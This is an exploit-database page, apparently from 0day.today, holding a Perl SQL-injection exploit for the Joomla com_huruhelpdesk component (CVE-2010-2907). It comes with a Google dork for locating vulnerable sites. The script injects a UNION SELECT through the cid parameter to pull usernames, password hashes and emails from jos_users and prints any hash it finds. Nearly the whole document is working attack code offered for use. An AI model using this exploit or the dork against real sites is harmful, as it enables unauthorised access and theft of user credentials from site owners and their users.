[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_huruhelpdesk Remote SQL Injection Vulnerability

Author
D35m0nd142
Risk
[
Security Risk High
]
0day-ID
0day-ID-19515
Category
web applications
Date add
04-10-2012
Platform
php
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection	
#Google Dork: "inurl:option=com_huruhelpdesk"
#Date: 04/10/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.huruhelpdesk.net/
#Tested on Joomla 1.5 
#CVE: 2010-2907


#!/usr/bin/perl
system("clear");
print "***************************************\n";
print " Joomla Component com_huruhelpdesk    *\n";
print "      SQL Injection exploit           *\n";
print "      Created by D35m0nd142           *\n";
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: http://www.site.com/dir] --> ";
chomp(my $target=<STDIN> );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}



#  0day.today [2024-11-16]  #